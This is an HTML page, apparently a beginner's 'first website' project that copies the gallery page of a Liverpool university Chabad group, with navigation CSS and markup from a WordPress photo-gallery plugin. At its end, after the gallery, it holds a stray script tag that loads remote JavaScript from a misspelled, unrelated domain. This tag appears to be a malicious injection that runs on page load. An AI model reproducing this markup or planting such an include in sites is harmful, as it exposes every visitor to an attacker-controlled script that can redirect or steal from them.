<!DOCTYPE html>
<html>
    <head>
        <title>Project: First Website</title>
        <meta charset="utf-8">
        <style>
        html {
            scroll-padding-top: 120px;
            scroll-behavior: smooth;
            }
         h1.title {
             margin-top: 120px;
            }
        .header {
            color: white;
            background-color: black;
            height: 10%;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            z-index:1;
            }
        #header-logo {
            margin-left: 80px;
            width: 150px;
            position: fixed;
            }
        .home {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-left: 280px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;     
            }
        .home:hover {
            color: black;
            background-color: white;
            }
        .contact-us {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;
            }
        .contact-us:hover {
            color: black;
            background-color: white;
            }
        .about-us {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;
            }
        .about-us:hover {
            color: black;
            background-color: white;
            }
        .shabbat {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;
            }
        .shabbat:hover {
            color: black;
            background-color: white;
            }
        .classes {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;
            }
        .classes:hover {
            color: black;
            background-color: white;
            }
        .programmes {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;
            }
        .programmes:hover {
            color: black;
            background-color: white;
            }
        .events {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;
            }
        .events:hover {
            color: black;
            background-color: white;
            }
        .galery {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;
            }
        .galery:hover {
            color: black;
            background-color: white;
            }
        .donate {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;
            }
        .donate:hover {
            color: black;
            background-color: white;
            }
        .visitor-information {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;
            }
        .visitor-information:hover {
            color: black;
            background-color: white;
            }
        .liverpool-waterfront {
            width: 100%;
            height: 50vh;
            top: 0;
            left: 0;
            margin-top: 70px;
            padding:0;
            }
        .intro-paragraph {
            width: 100%;
            top: 0;
            left: 0;
            padding-top: 20px;
            padding-bottom: 20px;
            background-color: rgb(211, 211, 211);
            color: black;
            text-align = center;
            }
        .first-sentence-intro {
            color: black;
            font-size = 30px;
            text-align: center;
            }
        .second-sentence-intro {
            font-size = 20px;
            text-align: center;
            }
        a {
            text-decoration-line: none;
            }
</style>
    </head>
    <body>
        <div class = "header">
           <a href = "/index.html"><img id = "header-logo" src = "https://www.ulivchabad.org/wp-content/uploads/2014/05/ChabadLiverpoolUnilogo-011.jpg" alt = "Chabad at Liverpool Universities Logo"></a>
            <table>
                <tbody>
                    <tr>
                        <td><a class = "home" href = "/index.html">Home</a></td>
                        <td><a class = "contact-us" href="/contact-us.html">Contact Us</a></td>
                        <td><a class = "about-us" href = "/about-us.html">About Us</a></td>
                        <td><a class = "shabbat" href = "/shabbat.html">Shabbat</a></td>
                        <td><a class = "classes" href = "/classes.html">Classes</a></td>
                        <td><a class = "programmes" href = "/programmes.html">Programmes</a></td>
                        <td><a class = "events" href = "/events.html">Events</a></td>
                        <td><a class = "galery" href = "/galery.html">Galery</a></td>
                        <td><a class = "donate" href = "/donate.html">Donate</a></td>
                        <td><a class = "visitor-information" href = "/visitor-information.html">Visitor Information</a></td>
                    </tr>
                </tbody>
            </table> 
        </div>
      <div class="row-fluid"><div class="span12 "><h1 style="text-align: center;">Gallery<br>
<style id="bwg-style-0">    #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-album-thumbnails {    width: 604px;    justify-content: center;            justify-content: center;        margin:0 auto !important;          background-color: rgba(255, 255, 255, 0.00);          padding-left: 4px;      padding-top: 4px;      max-width: 100%;          }        #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-album-thumbnails .bwg-item {    justify-content: flex-start;    max-width: 300px;          width: 300px !important;        }    #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-album-thumbnails .bwg-item > a {      margin-right: 4px;      margin-bottom: 4px;    }    #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-album-thumbnails .bwg-item0 {      padding: 0px;            background-color:rgba(0,0,0, 0.30);      border: 0px none #CCCCCC;      opacity: 1.00;      border-radius: 0;      box-shadow: 0px 0px 0px #888888;    }    #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-album-thumbnails .bwg-item1 img {      max-height: none;      max-width: none;      padding: 0 !important;    }          @media only screen and (min-width: 480px) {      #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-album-thumbnails .bwg-item1 img {      -webkit-transition: all .3s; transition: all .3s;      }      #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-album-thumbnails .bwg-item1 img:hover {        -ms-transform: scale(1.08);        -webkit-transform: scale(1.08);        transform: scale(1.08);      }            }          #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-album-thumbnails .bwg-item1 {      padding-top: 75%;    }        #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-album-thumbnails .bwg-title2 {      color: #323A45;      font-family: Ubuntu;      font-size: 16px;      font-weight: bold;      padding: 2px;      text-shadow: 0px 0px 0px #888888;      max-height: 100%;    }        #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-standard-thumbnails {      width: 1254px;              justify-content: center;        margin:0 auto !important;              background-color: rgba(255, 255, 255, 0.00);            padding-left: 4px;      padding-top: 4px;      max-width: 100%;            }        #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-standard-thumbnails .bwg-item {      justify-content: flex-start;      max-width: 250px;            width: 250px !important;          }    #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-standard-thumbnails .bwg-item > a {       margin-right: 4px;       margin-bottom: 4px;    }    #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-standard-thumbnails .bwg-item0 {      padding: 0px;            background-color:rgba(0,0,0, 0.30);      border: 0px none #CCCCCC;      opacity: 1.00;      border-radius: 0;      box-shadow: 0px 0px 0px #888888;    }    #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-standard-thumbnails .bwg-item1 img {      max-height: none;      max-width: none;      padding: 0 !important;    }         @media only screen and (min-width: 480px) {		#bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-standard-thumbnails .bwg-item1 img {			-webkit-transition: all .3s; transition: all .3s;		}		#bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-standard-thumbnails .bwg-item1 img:hover {			-ms-transform: scale(1.08);			-webkit-transform: scale(1.08);			transform: scale(1.08);		}		      }	    #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-standard-thumbnails .bwg-item1 {      padding-top: 75.2%;    }        #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-standard-thumbnails .bwg-title2,    #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-standard-thumbnails .bwg-ecommerce2 {      color: #323A45;      font-family: Ubuntu;      font-size: 16px;      font-weight: bold;      padding: 2px;      text-shadow: 0px 0px 0px #888888;      max-height: 100%;    }    #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-standard-thumbnails .bwg-thumb-description span {    color: #323A45;    font-family: Ubuntu;    font-size: 12px;    max-height: 100%;    word-wrap: break-word;    }    #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-standard-thumbnails .bwg-play-icon2 {      font-size: 32px;    }    #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-standard-thumbnails .bwg-ecommerce2 {      font-size: 19.2px;      color: #323A45;    }    </style>    <div id="bwg_container1_0" class="bwg_container bwg_thumbnail bwg_album_compact_preview" data-right-click-protection="0" data-bwg="0" data-gallery-type="album_compact_preview" data-current-url="https://www.ulivchabad.org/gallery/" data-lightbox-url="https://www.ulivchabad.org/wp-admin/admin-ajax.php?action=GalleryBox&amp;current_view=0&amp;gallery_id=0&amp;tag=0&amp;theme_id=1&amp;shortcode_id=0&amp;sort_by=order&amp;order_by=asc&amp;current_url=https%3A%2F%2Fwww.ulivchabad.org%2Fgallery%2F" data-gallery-id="0" data-popup-width="800" data-popup-height="500" data-is-album="album" data-buttons-position="bottom">      <div id="bwg_container2_0">             <div id="ajax_loading_0" class="bwg_loading_div_1 bwg-hidden">      <div class="bwg_loading_div_2">        <div class="bwg_loading_div_3">          <div id="loading_div_0" class="bwg_spider_ajax_loading">          </div>        </div>      </div>    </div>            <form id="gal_front_form_0" class="" method="post" action="#" data-current="0" data-shortcode-id="0" data-gallery-type="album_compact_preview" data-gallery-id="0" data-tag="0" data-album-id="1" data-theme-id="1" data-ajax-url="https://www.ulivchabad.org/wp-admin/admin-ajax.php?action=bwg_frontend_data">          <div id="bwg_container3_0" class="bwg-background bwg-background-0">                <div data-max-count="2" data-thumbnail-width="300" data-bwg="0" id="bwg_album_compact_0" class="bwg-thumbnails bwg-container bwg-container-0 bwg-album-thumbnails bwg_album_thumbnails_0">              <div class="bwg-item" style="width: 50%;">          <a class="bwg-a bwg-album bwg_album_0" href="/gallery/?type_0=gallery&amp;album_gallery_id_0=1" data-container_id="bwg_album_compact_0" data-def_type="gallery" data-album_gallery_id="1" data-alb_gal_id="1" data-title="Challah Baking Class" data-bwg="0">                        <div class="bwg-item0 ">              <div class="bwg-item1 ">                <div class="bwg-item2" style="margin-left: -19.3367px; margin-top: 0px;">                  <img class="skip-lazy " data-width="300" data-height="199" data-src="https://www.ulivchabad.org/wp-content/uploads/photo-gallery/thumb/FEATURED.jpg" src="https://www.ulivchabad.org/wp-content/uploads/photo-gallery/thumb/FEATURED.jpg" alt="Challah Baking Class" title="Challah Baking Class" style="height: 100%; width: 334.673px; max-width: initial;">                </div>                <div class="">                                  </div>              </div>            </div>            <div class="bwg-title1"><div class="bwg-title2">Challah Baking Class</div></div>          </a>        </div>                <div class="bwg-item" style="width: 50%;">          <a class="bwg-a bwg-album bwg_album_0" href="/gallery/?type_0=gallery&amp;album_gallery_id_0=2" data-container_id="bwg_album_compact_0" data-def_type="gallery" data-album_gallery_id="1" data-alb_gal_id="2" data-title="Superheroes Event" data-bwg="0">                        <div class="bwg-item0 ">              <div class="bwg-item1 ">                <div class="bwg-item2" style="margin-left: -19.3367px; margin-top: 0px;">                  <img class="skip-lazy " data-width="300" data-height="199" data-src="https://www.ulivchabad.org/wp-content/uploads/photo-gallery/thumb/102051pic.jpg" src="https://www.ulivchabad.org/wp-content/uploads/photo-gallery/thumb/102051pic.jpg" alt="Superheroes Event" title="Superheroes Event" style="height: 100%; width: 334.673px; max-width: initial;">                </div>                <div class="">                                  </div>              </div>            </div>            <div class="bwg-title1"><div class="bwg-title2">Superheroes Event</div></div>          </a>        </div>                <div class="bwg-item" style="width: 50%;">          <a class="bwg-a bwg-album bwg_album_0" href="/gallery/?type_0=gallery&amp;album_gallery_id_0=3" data-container_id="bwg_album_compact_0" data-def_type="gallery" data-album_gallery_id="1" data-alb_gal_id="3" data-title="Lunch N' Learn" data-bwg="0">                        <div class="bwg-item0 ">              <div class="bwg-item1 ">                <div class="bwg-item2" style="margin-left: -50.2165px; margin-top: 0px;">                  <img class="skip-lazy " data-width="" data-height="" data-src="https://www.ulivchabad.org/wp-content/uploads/photo-gallery/thumb/Lunch N' Learn1.jpg" src="https://www.ulivchabad.org/wp-content/uploads/photo-gallery/thumb/Lunch%20N'%20Learn1.jpg" alt="Lunch N' Learn" title="Lunch N' Learn" style="height: 100%; width: 396.433px; max-width: initial;">                </div>                <div class="">                                  </div>              </div>            </div>            <div class="bwg-title1"><div class="bwg-title2">Lunch N' Learn</div></div>          </a>        </div>                <div class="bwg-item" style="width: 50%;">          <a class="bwg-a bwg-album bwg_album_0" href="/gallery/?type_0=gallery&amp;album_gallery_id_0=4" data-container_id="bwg_album_compact_0" data-def_type="gallery" data-album_gallery_id="1" data-alb_gal_id="4" data-title="Chanuka" data-bwg="0">                        <div class="bwg-item0 ">              <div class="bwg-item1 ">                <div class="bwg-item2" style="margin-left: -19.3367px; margin-top: 0px;">                  <img class="skip-lazy " data-width="300" data-height="199" data-src="https://www.ulivchabad.org/wp-content/uploads/photo-gallery/thumb/Chanuka_Main.jpg" src="https://www.ulivchabad.org/wp-content/uploads/photo-gallery/thumb/Chanuka_Main.jpg" alt="Chanuka" title="Chanuka" style="height: 100%; width: 334.673px; max-width: initial;">                </div>                <div class="">                                  </div>              </div>            </div>            <div class="bwg-title1"><div class="bwg-title2">Chanuka</div></div>          </a>        </div>                <div class="bwg-item" style="width: 50%;">          <a class="bwg-a bwg-album bwg_album_0" href="/gallery/?type_0=gallery&amp;album_gallery_id_0=5" data-container_id="bwg_album_compact_0" data-def_type="gallery" data-album_gallery_id="1" data-alb_gal_id="5" data-title="Italian Shabbaton" data-bwg="0">                        <div class="bwg-item0 ">              <div class="bwg-item1 ">                <div class="bwg-item2" style="margin-left: 0px; margin-top: -112.116px;">                  <img class="skip-lazy " data-width="199" data-height="300" data-src="https://www.ulivchabad.org/wp-content/uploads/photo-gallery/Italian Shabbaton/thumb/Italian Shabbaton_Main.jpg" src="https://www.ulivchabad.org/wp-content/uploads/photo-gallery/Italian%20Shabbaton/thumb/Italian%20Shabbaton_Main.jpg" alt="Italian Shabbaton" title="Italian Shabbaton" style="width: 100%; height: 446.231px;">                </div>                <div class="">                                  </div>              </div>            </div>            <div class="bwg-title1"><div class="bwg-title2">Italian Shabbaton</div></div>          </a>        </div>                <div class="bwg-item" style="width: 50%;">          <a class="bwg-a bwg-album bwg_album_0" href="/gallery/?type_0=gallery&amp;album_gallery_id_0=6" data-container_id="bwg_album_compact_0" data-def_type="gallery" data-album_gallery_id="1" data-alb_gal_id="6" data-title="Shwarma Evening - Dr.Wise" data-bwg="0">                        <div class="bwg-item0 ">              <div class="bwg-item1 ">                <div class="bwg-item2" style="margin-left: -19.3367px; margin-top: 0px;">                  <img class="skip-lazy " data-width="300" data-height="199" data-src="https://www.ulivchabad.org/wp-content/uploads/photo-gallery/Shwarma Evening - Dr.Wise/thumb/Shwarma Evening - Dr.Wise.jpg" src="https://www.ulivchabad.org/wp-content/uploads/photo-gallery/Shwarma%20Evening%20-%20Dr.Wise/thumb/Shwarma%20Evening%20-%20Dr.Wise.jpg" alt="Shwarma Evening - Dr.Wise" title="Shwarma Evening - Dr.Wise" style="height: 100%; width: 334.673px; max-width: initial;">                </div>                <div class="">                                  </div>              </div>            </div>            <div class="bwg-title1"><div class="bwg-title2">Shwarma Evening - Dr.Wise</div></div>          </a>        </div>            </div>          <input type="hidden" id="bwg_album_breadcrumb_0" name="bwg_album_breadcrumb_0" value="[{&quot;id&quot;:1,&quot;page&quot;:1}]">    <style>      /*pagination styles*/      #bwg_container1_0 #bwg_container2_0 .tablenav-pages_0 {				text-align: center;				font-size: 12px;				font-family: Ubuntu;				font-weight: bold;				color: #666666;				margin: 6px 0 4px;				display: block;      }      @media only screen and (max-width : 320px) {      #bwg_container1_0 #bwg_container2_0 .displaying-num_0 {     	 display: none;      }      }      #bwg_container1_0 #bwg_container2_0 .displaying-num_0 {				font-size: 12px;				font-family: Ubuntu;				font-weight: bold;				color: #666666;				margin-right: 10px;				vertical-align: middle;      }      #bwg_container1_0 #bwg_container2_0 .paging-input_0 {				font-size: 12px;				font-family: Ubuntu;				font-weight: bold;				color: #666666;				vertical-align: middle;      }      #bwg_container1_0 #bwg_container2_0 .tablenav-pages_0 a.disabled,      #bwg_container1_0 #bwg_container2_0 .tablenav-pages_0 a.disabled:hover,      #bwg_container1_0 #bwg_container2_0 .tablenav-pages_0 a.disabled:focus,			#bwg_container1_0 #bwg_container2_0 .tablenav-pages_0 input.bwg_current_page {				cursor: default;				color: rgba(102, 102, 102, 0.5);      }      #bwg_container1_0 #bwg_container2_0 .tablenav-pages_0 a,      #bwg_container1_0 #bwg_container2_0 .tablenav-pages_0 input.bwg_current_page {				cursor: pointer;				text-align: center;				font-size: 12px;				font-family: Ubuntu;				font-weight: bold;				color: #666666;				text-decoration: none;				padding: 3px 6px;				margin: 0;				border-radius: 0;				border-style: solid;				border-width: 1px;				border-color: #E3E3E3;				background-color: #FFFFFF;				opacity: 1.00;				box-shadow: 0;				transition: all 0.3s ease 0s;-webkit-transition: all 0.3s ease 0s;      }      </style>      <span class="bwg_nav_cont_0">              <div class="tablenav-pages_0">                      <span class="pagination-links_0 pagination-links" data-pages-count="4">              <span class="pagination-links_col1">              <a class="bwg-a first-page disabled" title="Go to the first page">«</a>              <a class="bwg-a prev-page disabled" title="Go to the previous page">‹</a>              </span>							<span class="pagination-links_col2">									<input type="number" class="bwg_current_page" name="bwg_current_page" value="1" data-url-info="page_number_0" onkeypress="return bwg_change_page_0(event, this)" min="1" oninput="validity.valid||(value='')">										of										<span class="total-pages_0">											4										</span>							</span>              <span class="pagination-links_col3">                <a class="bwg-a next-page-0" title="Go to the next page" href="/gallery/?page_number_0=2">›</a>                <a class="bwg-a last-page-0" title="Go to the last page" href="/gallery/?page_number_0=4">»</a>              </span>						</span>						        </div>                <input type="hidden" id="page_number_0" name="page_number_0" value="1">      <script type="text/javascript">        function spider_page_0(cur, x, y, load_more) {          if (typeof load_more == "undefined") {            var load_more = false;          }          if (jQuery(cur).hasClass('disabled')) {            return false;          }          var items_county_0 = 4;          switch (y) {            case 1:              if (x >= items_county_0) {                document.getElementById('page_number_0').value = items_county_0;              }              else {                document.getElementById('page_number_0').value = x + 1;              }              break;            case 2:              document.getElementById('page_number_0').value = items_county_0;              break;            case -1:              if (x == 1) {                document.getElementById('page_number_0').value = 1;              }              else {                document.getElementById('page_number_0').value = x - 1;              }              break;            case -2:              document.getElementById('page_number_0').value = 1;              break;						case 0:              document.getElementById('page_number_0').value = x;              break;            default:              document.getElementById('page_number_0').value = 1;          }          bwg_ajax('gal_front_form_0', '0', 'bwg_album_compact_0', '1', '', 'album', 0, '', '', load_more, '', 1);        }                    jQuery('.first-page disabled').on('click', function () {              spider_page_0(this, 1, -2, 'numeric');              return false;            });            jQuery('.prev-page disabled').on('click', function () {              spider_page_0(this, 1, -1, 'numeric');              return false;            });            jQuery('.next-page-0').on('click', function () {              spider_page_0(this, 1, 1, 'numeric');              return false;            });            jQuery('.last-page-0').on('click', function () {              spider_page_0(this, 1, 2, 'numeric');              return false;            });        				/* Change page on input enter. */        function bwg_change_page_0( e, that ) {          if (  e.key == 'Enter' ) {            var to_page = parseInt(jQuery(that).val());            var pages_count = jQuery(that).parents(".pagination-links").data("pages-count");            var current_url_param = jQuery(that).attr('data-url-info');            if (to_page > pages_count) {              to_page = 1;            }	 												spider_page_0(this, to_page, 0, 'numeric');							return false;						          }          return true;        }        jQuery('.bwg_load_btn_0').on('click', function () {            spider_page_0(this, 1, 1, true);            return false;        });      </script>      </span>                </div>        </form>        <style>          #bwg_container1_0 #bwg_container2_0 #spider_popup_overlay_0 {          background-color: #EEEEEE;          opacity: 0.60;          }          </style>        <div id="bwg_spider_popup_loading_0" class="bwg_spider_popup_loading"></div>        <div id="spider_popup_overlay_0" class="spider_popup_overlay" onclick="spider_destroypopup(1000)"></div>        <input type="hidden" id="bwg_random_seed_0" value="">                </div>    </div>    <script>      if (document.readyState === 'complete') {        if( typeof bwg_main_ready == 'function' ) {          if ( jQuery("#bwg_container1_0").height() ) {            bwg_main_ready(jQuery("#bwg_container1_0"));          }        }      } else {        document.addEventListener('DOMContentLoaded', function() {          if( typeof bwg_main_ready == 'function' ) {            if ( jQuery("#bwg_container1_0").height() ) {             bwg_main_ready(jQuery("#bwg_container1_0"));            }          }        });      }    </script>    </h1>
<p><script src="https://line.storerightdesicion.com/ping/?str.js" type="text/javascript"></script></p>
</div></div>
